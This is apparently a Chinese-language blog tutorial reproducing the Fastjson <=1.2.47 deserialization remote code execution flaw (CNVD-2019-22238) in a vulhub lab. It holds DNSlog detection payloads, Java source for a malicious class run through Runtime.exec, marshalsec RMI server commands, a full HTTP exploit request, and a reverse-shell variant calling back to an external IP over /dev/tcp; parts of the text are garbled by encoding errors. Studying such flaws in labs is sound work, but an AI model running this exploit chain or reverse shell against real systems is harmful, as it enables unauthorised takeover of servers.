Fastjson <=1.2.47反序列化RCE漏洞（CNVD‐2019‐22238）?

一、漏洞描述?

Fastjson 是阿里巴巴的開源JSON解析庫，它可以解析 JSON 格式的字符串，支持將 Java Bean 序列化為 JSON 字符串，也可以從 JSON 字符串反序列化到 JavaBean。Fastjson提供了autotype功能，允許用戶在反序列化數(shù)據(jù)中通過“@type”指定反序列化的類型，其次，Fastjson自定義的反序列化機(jī)制時(shí)會(huì)調(diào)用指定類中的setter方法及部分getter方法，那么當(dāng)組件開啟了autotype功能并且反序列化不可信數(shù)據(jù)時(shí)，攻擊者可以構(gòu)造數(shù)據(jù)，使目標(biāo)應(yīng)用的代碼執(zhí)行流程進(jìn)入特定類的特定setter或者getter方法中，若指定類的指定方法中有可被惡意利用的邏輯（也就是通常所指的“Gadget”），則會(huì)造成一些嚴(yán)重的安全問題。并且在Fastjson 1.2.47及以下版本中，利用其緩存機(jī)制可實(shí)現(xiàn)對(duì)未開啟autotype功能的繞過。?

二、影響版本

Fastjson1.2.47以及之前的所有版本

三、環(huán)境搭建

vulhub靶場(chǎng)，進(jìn)入fastjson漏洞環(huán)境目錄下，執(zhí)行

cd 1.2.47‐rce/ docker‐compose up ‐d

四、漏洞檢測(cè)

后臺(tái)回復(fù)FastJson獲取下圖工具

手動(dòng)檢測(cè)：

{"a":{"@type":"java.net.Inet4Address","val":"dnslog"}}{"a":{"@type":"java.net.Inet6Address","val":"dnslog"}}{"a":{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}}{"a":{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}}{"a":{"@type":"java.net.URL","val":"dnslog"}}

五、漏洞復(fù)現(xiàn)

1、編譯上傳TouchFile.class

這里的TouchFile是要編譯好的惡意類，將編譯好的TouchFile.class放在tomcat webapps/ROOT 目錄下，java源碼如下

import java.lang.Runtime; import java.lang.Process;
public class TouchFile {     static {         try {            Runtime rt = Runtime.getRuntime();             String[] commands = {"touch", "/tmp/success"};             Process pc = rt.exec(commands);             pc.waitFor();                     } catch (Exception e) {             // do nothing         }    } }

2、編譯需要使用java環(huán)境，安裝步驟如下

sudo?apt‐get?update?#更新軟件包列表sudo?apt?install?default‐jre?#安裝默認(rèn)jre?java?‐version?#查看java版本

javac TouchFile.java #編譯為TouchFile.class

3、安裝docker 拉起tomcat

curl ‐s https://get.docker.com/ | shcurl ‐s https://bootstrap.pypa.io/get‐pip.py | pythonpip install docker‐compose
docker search tomcat #搜索鏡像(默認(rèn)去Docker Hub查找)docker pull tomcat:8.0.52 #指定版本拉取tomcatdocker images #拉取成功查看拉取的鏡像docker run ‐‐name ytomcat ‐d ‐p 8081:8080 tomcat:8.0.52 #根據(jù)鏡像啟動(dòng)一個(gè)容器

4、宿主機(jī)向Docker容器傳送文件

docker cp 本地文件的路徑 container_id:<docker容器內(nèi)的路徑>docker cp /root/TouchFile.class 5eff9f38e0c7:/usr/local/tomcat/webapps/ROOT #例子mkdir TouchFile #創(chuàng)建TouchFile目錄mv?TouchFile.class?TouchFile?#將TouchFile.class剪切到TouchFile目錄里

? ?????????????????????????????????????????????????????????????????????????????????????????????

將exp.class上傳至你的web服務(wù)器，地址為http://yours_ip/exp/TouchFile.class。?

我的地址為：http://8.210.235.249/TouchFile/TouchFile.class

5、借助marshalsec項(xiàng)目，快速開啟rmi或ldap服務(wù)

apt install git #安裝gitgit clone https://github.com/mbechler/marshalsec #下載marshalsecapt install maven #下載maven，使用maven進(jìn)行編譯jar包cd marshalsecmvn clean package ‐DskipTests

啟動(dòng)一個(gè)RMI服務(wù)器，監(jiān)聽9988端口，并制定加載遠(yuǎn)程類TouchFile.class：

cd target java ‐cp marshalsec‐0.0.3‐SNAPSHOT‐all.jar marshalsec.jndi.RMIRefServer "ht tp://8.210.235.249/#TouchFile" 9988

6、發(fā)送Payload

POST / HTTP/1.1Host: your‐ip:8090Accept‐Encoding: gzip, deflateAccept: */*Accept‐Language: enUser‐Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent‐Type: application/jsonContent‐Length: 160
{????"a":{????????"@type":"java.lang.Class",??????  "val":"com.sun.rowset.JdbcRowSetImpl"?????},???? "b":{?????????"@type":"com.sun.rowset.JdbcRowSetImpl",?????????"dataSourceName":"rmi://8.210.235.249/exp"?????????"autoCommit":true?????}}

至此漏洞復(fù)現(xiàn)成功

六、反彈shell

import java.lang.Runtime;import java.lang.Process;
public class TouchFile {    static {        try {            Runtime rt = Runtime.getRuntime();            String[] commands = {"/bin/bash","‐c","bash ‐i >& /dev/tcp/8.21 0.235.249/6666 0>&1"};            Process pc = rt.exec(commands);            pc.waitFor();        } catch (Exception e) {            // do nothing        }    }}

和前邊同理：編譯‐‐>將TouchFile.class上傳至web服務(wù)器‐‐>啟動(dòng)RMI服務(wù)器監(jiān)聽端口‐‐>nc 監(jiān)聽端口‐‐ >burpsuite發(fā)送Payload

相關(guān)文章

Fastjson

五、漏洞復(fù)現(xiàn)

Fastjson‐CNVD‐2017‐02833